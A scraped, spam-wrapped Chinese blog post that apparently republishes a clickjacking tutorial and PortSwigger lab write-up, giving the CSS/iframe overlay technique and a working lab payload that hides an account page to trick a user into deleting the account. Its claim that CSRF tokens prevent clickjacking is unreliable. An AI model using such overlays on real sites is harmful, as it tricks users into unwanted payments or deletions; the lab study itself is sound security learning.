当前位置: 首页 > wzjs >正文

深圳最大的软件公司南京网站优化公司排名

深圳最大的软件公司,南京网站优化公司排名,辽宁省城乡建设网站,建筑网站新闻写那些好一:漏洞原理 1、什么是点解劫持 点击劫持是一种基于界面的攻击,用户通过点击诱饵网站中的一些其他内容,被诱骗点击隐藏网站上的可操作内容。一个网络用户访问一个诱骗网站(也许这是一个由电子邮件提供的链接)并点击一…

一:漏洞原理

1、什么是点解劫持

  • 点击劫持是一种基于界面的攻击,用户通过点击诱饵网站中的一些其他内容,被诱骗点击隐藏网站上的可操作内容。
  • 一个网络用户访问一个诱骗网站(也许这是一个由电子邮件提供的链接)并点击一个按钮来赢得奖品。在不知不觉中,他们被攻击者欺骗,按下了另一个隐藏按钮,这导致了另一个网站上的帐户付款。这是一个点击劫持攻击的例子。该技术依赖于合并一个不可见的、可操作的网页(或多个网页),其中包含一个按钮或隐藏链接,比如说,在iframe中。iframe覆盖在用户预期的诱饵网页内容之上。
    (此攻击与 CSRF攻击的不同之处在于,用户需要执行按钮单击等操作,而CSRF攻击依赖于在用户不知情或不输入的情况下伪造整个请求)
  • 示例:网络用户访问诱饵网站(也许这是电子邮件提供的链接)并点击按钮以赢得奖品。在不知不觉中,他们被攻击者欺骗按下了另一个隐藏按钮,这导致在另一个站点上支付了帐户费用。这是点击劫持攻击的一个示例。该技术依赖于合并一个不可见的、可作的网页(或多个页面),其中包含一个按钮或隐藏的链接,例如,在 iframe 中。iframe 覆盖在用户预期的诱饵网页内容之上。这种攻击与 CSRF 攻击的不同之处在于,用户需要执行诸如按钮单击之类的作,而 CSRF 攻击则依赖于在用户不知情或输入的情况下伪造整个请求。
    在这里插入图片描述

2、防范攻击

  • 通常通过使用CSRF令牌来放置CSRF攻击:特定于会话的一次性使用数字或nonce。

3、构建基本的点击劫持实验

(1)点击劫持攻击使用CSS来创建和操作层。攻击者将目标网站合并覆盖在诱饵网站的iframe层

<head><style>#target_website {position:relative;width:128px;height:128px;opacity:0.00001;z-index:2;}#decoy_website {position:absolute;width:300px;height:400px;z-index:1;}</style>
</head>
...
<body><div id="decoy_website">...decoy web content here...</div><iframe id="target_website" src="https://vulnerable-website.com"></iframe>
</body>

二:PortSwigger靶场

1、使用 CSRF 令牌保护进行基本点击劫持

(1)题目要求:制作html页面来构建账户页面并欺骗用户删除账户(制作一个相同的界面)

<style>iframe {position:relative;width:$width_value;height: $height_value;opacity: $opacity;z-index: 2;}div {position:absolute;top:$top_value;left:$side_value;z-index: 1;}
</style>
<div>Test me</div>
<iframe src="YOUR-LAB-ID.web-security-academy.net/my-account"></iframe>我的是:
<style>
iframe {position:relative;width:500px;height: 700px;opacity: 0.0001;z-index: 2;
}
div {position:absolute;top:500px;left:60px;z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://0a11000404d22a86c463666000e90017.web-security-academy.net/my-account"></iframe>

陆续更新中…


文章转载自:

http://6t5SZnfd.Lfcfn.cn
http://y0BBoUms.Lfcfn.cn
http://uV0XxAKd.Lfcfn.cn
http://FlqgS4bl.Lfcfn.cn
http://8Ie3aDey.Lfcfn.cn
http://CrqqEvO0.Lfcfn.cn
http://0BiCTceC.Lfcfn.cn
http://oi8VCeBM.Lfcfn.cn
http://FTvLhenk.Lfcfn.cn
http://1O65LGbW.Lfcfn.cn
http://gUowDMdJ.Lfcfn.cn
http://37Ui7ZU9.Lfcfn.cn
http://ZXqkz89o.Lfcfn.cn
http://Dtxe8qPG.Lfcfn.cn
http://OO9hHrk4.Lfcfn.cn
http://7CImKo5s.Lfcfn.cn
http://8DjuE4CW.Lfcfn.cn
http://oFq7ILwj.Lfcfn.cn
http://9ULV8QuD.Lfcfn.cn
http://2He8osUx.Lfcfn.cn
http://C4Ti3VeY.Lfcfn.cn
http://bWp9618R.Lfcfn.cn
http://gwPOSQJh.Lfcfn.cn
http://htVIzQvK.Lfcfn.cn
http://Fdz5ONYL.Lfcfn.cn
http://SSbFmZpQ.Lfcfn.cn
http://iP5RHJiU.Lfcfn.cn
http://egM8Fcvp.Lfcfn.cn
http://0QR8CP4I.Lfcfn.cn
http://IUwKbSBF.Lfcfn.cn
http://www.dtcms.com/wzjs/724383.html

相关文章:

  • 软件网站设计师培训网页小程序开发
  • 网站建设与网页制作招聘那个合作网站做360推广比较好
  • 完整域名展示网站源码优化大师在哪里
  • 外贸在哪些网站开发客户网站建设原创文章 关键词
  • 怎样查看网站是否备案大理州建设局投诉网站
  • 洛阳网站改版深圳网站建设加q5299丶14602推广
  • iis怎么做网站空间韩国平面设计网站
  • 杭州网站免费制作专业网站建设市场分析
  • 编写网站策划方案制作表白网站教程
  • 营销型网站建设 合肥校园旅游网站建设方案策划书
  • 商业门户网站是什么意思找推广平台需要多少钱
  • 公司申请网站建设的工作方案黑龙江省建设银行官网站首页
  • 外贸订单的网站怎么做社交网站引流到亚马逊
  • 医院做网站的风格广州番禺建设银行网站登录
  • 项目四网站建设内容wordpress tag 别名
  • 做网站买域名怎么弄批量上传 wordpress
  • 如皋企业网站建设wordpress找不到后台
  • 批量查询网站是否正常潍坊专业网站建设哪家好
  • 用服务器建立网站吗建设银行造价咨询中心网站
  • 邯郸网站设计哪家好那些网站是php开发的
  • 黔西南州住房和城乡建设局网站个人网站备案 资料
  • 郑州网站推广报价百度地图下载2022新版安装
  • 建设网站技术公司电话flashfxp上传网站模板
  • 用绿色做图标的网站国美网站建设特点
  • 网站单页别人是怎么做的制作一个网站费用
  • 如何给网站做seocms 官方网站
  • 专业建筑公司网站建设银行观澜支行网站
  • 网站免费正能量加载要快四川代理网站建设的公司
  • 单位网里建网站企业网站开发费用
  • 网站应包括的基本功能和高级功能网站右侧浮动广告